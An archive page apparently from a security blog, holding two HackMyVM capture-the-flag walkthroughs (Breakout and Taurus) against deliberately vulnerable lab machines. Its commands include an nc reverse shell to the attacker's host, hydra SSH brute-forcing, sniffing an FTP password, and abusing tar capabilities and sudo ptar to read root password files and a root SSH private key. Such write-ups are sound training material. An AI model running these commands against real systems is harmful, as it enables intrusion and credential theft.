日度归档:2021 年 10 月 22 日

HackMyVm Breakout Walkthrough

HackMyVm Breakout Walkthrough

Key points: good enum

https://hackmyvm.eu/machines/machine.php?vm=Breakout

Scan ports.

 ~ nmap -sV -sC -p-  -Pn 192.168.33.145  -oN ports.log    
 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.                              
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-22 22:02 CST                                                              
 Nmap scan report for 192.168.33.145                            
 Host is up (0.0022s latency).                                  
 Not shown: 65530 closed ports                                  
 PORT      STATE SERVICE     VERSION                            
 80/tcp    open  http        Apache httpd 2.4.51 ((Debian))
 |_http-server-header: Apache/2.4.51 (Debian)                  
 |_http-title: Apache2 Debian Default Page: It works            
 139/tcp   open  netbios-ssn Samba smbd 4.6.2                  
 445/tcp   open  netbios-ssn Samba smbd 4.6.2                  
 10000/tcp open  http        MiniServ 1.981 (Webmin httpd)                                                                    
 |_http-title: 200 — Document follows                    
 20000/tcp open  http        MiniServ 1.830 (Webmin httpd)
 |_http-title: 200 — Document follows
 Host script results:                                          
 |_clock-skew: 7h59m58s                                        
 |_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 | smb2-security-mode:                                          
 |   2.02:                                                      
 |_    Message signing enabled but not required                
 | smb2-time:                                                  
 |   date: 2021-10-22T22:03:10                                  
 |_  start_date: N/A                                            

Check source code of index.html at port 80.

<!--
 don't worry no one will get here, it's safe to share with you my access. Its encrypted :)

 ++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.

 -->

It's brainfuck code. Decode it online, get string `".2uqPEfj3D<P'a-3"`.

Use enum4linux to enum.

```bash
~ enum4linux 192.168.33.145 | tee enum.log
...
S-1-22-1-1000 Unix User\cyber (Local User)


With username cyber and password we decode from brainfuck code, we can login at port 20000.

In control panel, we found command shell.

image-20211022224903817.png

Run "nc 192.168.33.128 1234 -e /bin/bash", we can get reverse shell.

 ```bash
~ nc -nlvp 1234                                                                                          fish-0 | 0 [22:47:24]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.33.145.
 Ncat: Connection from 192.168.33.145:35206.
 id
 uid=1000(cyber) gid=1000(cyber) groups=1000(cyber),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
 python3 -c 'import pty;pty.spawn("/bin/bash")'
 cyber@breakout:~$

Search cap.

```bash
cyber@breakout:/$ getcap / -r 2>/dev/null
getcap / -r 2>/dev/null
/home/cyber/tar cap_dac_read_search=ep
/usr/bin/ping cap_net_raw=ep


And we found password backup.

 ```bash
cyber@breakout:/tmp$ ls -la /var/backups
 ls -la /var/backups
 total 12
 drwxr-xr-x  2 root root 4096 Oct 20 07:49 .
 drwxr-xr-x 14 root root 4096 Oct 19 13:48 ..
 -rw-------  1 root root   17 Oct 20 07:49 .old_pass.bak

We can compress it can extract it in /tmp folder using /home/cyber/tar.

 cyber@breakout:/tmp$ /home/cyber/tar -cvf pass.tar /var/backups
 /home/cyber/tar -cvf pass.tar /var/backups
 /home/cyber/tar: Removing leading `/' from member names
 /var/backups/
 /var/backups/.old_pass.bak
 cyber@breakout:/tmp$ tar -xvf pass.tar
 tar -xvf pass.tar
 var/backups/
 var/backups/.old_pass.bak
 cyber@breakout:/tmp$ cd var/backups
 cd var/backups
 cyber@breakout:/tmp/var/backups$ cat .old_pass.bak
 cat .old_pass.bak
 Ts&4&YurgtRX(=~h

Finally we get root.

```bash
root@breakout:~# id;hostname
id;hostname
uid=0(root) gid=0(root) groups=0(root)
breakout

HackMyVm Taurus Walkthrough

HackMyVm Taurus Walkthrough

Keypoints: generate custom dic, tcpdump, IPv6

https://hackmyvm.eu/machines/machine.php?vm=Taurus

Scan ports first, only 21 and 22 open, and 21 is filtered.

 nmap -sV -sC -p- -Pn -oN ports.log 192.168.56.100
 Nmap scan report for deathnote.vuln (192.168.56.100)
 Host is up (0.00082s latency).
 Not shown: 65533 closed ports
 PORT   STATE    SERVICE VERSION
 21/tcp filtered ftp
 22/tcp open     ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
 | ssh-hostkey:
 |   3072 9e:f1:ed:84:cc:41:8c:7e:c6:92:a9:b4:29:57:bf:d1 (RSA)
 |   256 9f:f3:93:db:72:ff:cd:4d:5f:09:3e:dc:13:36:49:23 (ECDSA)
 |_  256 e7:a3:72:dd:d5:af:e2:b5:77:50:ab:3d:27:12:0f:ea (ED25519)
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan udp ports, we found snmp port is open.

 nmap -sU --top-ports 200 -oN udp_ports.log 192.168.56.100
 Nmap scan report for deathnote.vuln (192.168.56.100)
 Host is up (0.00089s latency).
 Not shown: 198 closed ports
 PORT    STATE         SERVICE
 68/udp  open|filtered dhcpc
 161/udp open|filtered snmp

Use snmpwalk to get info from port 161, now we know the name sarah.

 ~ snmpwalk -v 1 -c public 192.168.56.100    
 iso.3.6.1.2.1.1.1.0 = STRING: "Linux taurus 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64"
 iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
 iso.3.6.1.2.1.1.3.0 = Timeticks: (1183326) 3:17:13.26
 iso.3.6.1.2.1.1.4.0 = STRING: "Sarah <sarah@hmv.org>"
 iso.3.6.1.2.1.1.5.0 = STRING: "\"I Love My Name, Don't You, Little Hackers ?\""
 iso.3.6.1.2.1.1.6.0 = STRING: "Unknown"
 iso.3.6.1.2.1.1.8.0 = Timeticks: (1) 0:00:00.01

...

Here is the tricky part. In order to brute force ssh password of sarah, we need a password dic, which can be generated by cupp. First name is sarah, the rest part input nothing.

~ cupp -i        
  ___________                                                                              
    cupp.py!                 # Common
       \                     # User
        \   ,__,             # Passwords
         \  (oo)____         # Profiler
            (__)    )\    
               ||--|| *      [ Muris Kurgas | j0rgan@remote-exploit.org ]
                             [ Mebus | https://github.com/Mebus/]

 [+] Insert the information about the victim to make a dictionary
 [+] If you don't know all the info, just hit enter when asked! ;)

 > First Name: sarah
 > Surname:
 > Nickname:
 > Birthdate (DDMMYYYY):
 ...

Successfully get the password of sarah.

```bash
~ hydra -l sarah -P sarah.txt -e nsr 192.168.56.100 ssh -t64 -F
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-10-21 11:34:10
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 111 login tries (l:1/p:111), ~2 tries per task
[DATA] attacking ssh://192.168.56.100:22/
[22][ssh] host: 192.168.56.100 login: sarah password: Sarah_2012
[STATUS] attack finished for 192.168.56.100 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-10-21 11:34:26


In sarah's home folder, found a file default.tar, which is unreadable now.

 ```bash
sarah@taurus:~$ ls -la
 total 32
 drwx------ 2 sarah sarah 4096 Oct 20 17:14 .
 drwxr-xr-x 4 root  root  4096 Oct 16 19:17 ..
 lrwxrwxrwx 1 root  root     9 Oct 16 19:56 .bash_history -> /dev/null
 -rw-r--r-- 1 sarah sarah  220 Oct 16 08:53 .bash_logout
 -rw-r--r-- 1 sarah sarah 3526 Oct 16 08:53 .bashrc
 -rw-r--r-- 1 root  root  4608 Oct 20 17:09 default.tar
 -rw-r--r-- 1 sarah sarah  807 Oct 16 08:53 .profile
 -rw------- 1 sarah sarah  104 Oct 20 17:14 .Xauthority

Check sudo -l of user.

```bash
sarah@taurus:~$ sudo -l
Matching Defaults entries for sarah on taurus:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sarah may run the following commands on taurus:
(marion : marion) NOPASSWD: /usr/bin/bash /opt/ftp


Try to run it.  The ftp port opened and closed again quickly.

 ```bash
sarah@taurus:~$ sudo -u marion /usr/bin/bash /opt/ftp
 ftp connection opened.
 ftp connection closed.

Open another ssh terminal, run tcpdump to get data.

```bash
sarah@taurus:~$ tcpdump -i lo -nn -A
...
17:03:43.659795 IP6 ::1.21 > ::1.34582: Flags [P.], seq 36:70, ack 14, win 512, options [nop,nop,TS val 3615192936 ecr 3
615192936], length 34: FTP: 331 Password required for marion
`....B.@.....................................H*9.........J.....
.{wh.{wh331 Password required for marion

17:03:43.659802 IP6 ::1.34582 > ::1.21: Flags [.], ack 70, win 512, options [nop,nop,TS val 3615192936 ecr 3615192936],
length 0
`.EX. .@.........................................H*[.....(.....
.{wh.{wh
17:03:43.659819 IP6 ::1.34582 > ::1.21: Flags [P.], seq 14:32, ack 70, win 512, options [nop,nop,TS val 3615192936 ecr 3
615192936], length 18: FTP: PASS ilovesushis
...


Escalate to user marion, check sudo -l again.

 ```bash
sarah@taurus:~$ su marion
 Password:
 marion@taurus:/home/sarah$ sudo -l
 Matching Defaults entries for marion on taurus:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User marion may run the following commands on taurus:
     (ALL : ALL) NOPASSWD: /usr/bin/ptar

Use ptar to pack /root/ to /tmp/, then extract it use tar.

```bash
marion@taurus:/tmp$ sudo /usr/bin/ptar -cvf root.tar /root/
/root
/root/.bashrc
/root/root.txt
/root/.profile
/root/.bash_history
/root/.local
/root/.local/share
/root/.local/share/nano
/root/.ssh
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
marion@taurus:/tmp$ tar -xvf root.tar -C ./
tar: Removing leading `//' from member names
//root
tar: Removing leading `/' from member names
/root/.bashrc
/root/root.txt
/root/.profile
/root/.bash_history
/root/.local
/root/.local/share
/root/.local/share/nano
/root/.ssh
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
marion@taurus:/tmp$ cat ./root/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAuhCb4PqUqWAgQROGlOfqHiE9bBbe+bavDZjpFidqVJYxX5Jm9Mv/
e0R4R/1zwXxz0JdPAMZUOS8W9oiuc3TQ+seOp6vWKdLRd98bDycruGpbgMzHF0kULDeCN
...


Get root with ssh.

 ```bash
marion@taurus:/tmp$ ssh root@localhost -i root/.ssh/id_rsa
 Linux taurus 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64

 The programs included with the Debian GNU/Linux system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.

 Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
 permitted by applicable law.
 Last login: Sat Oct 16 21:20:06 2021
 root@taurus:~# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 taurus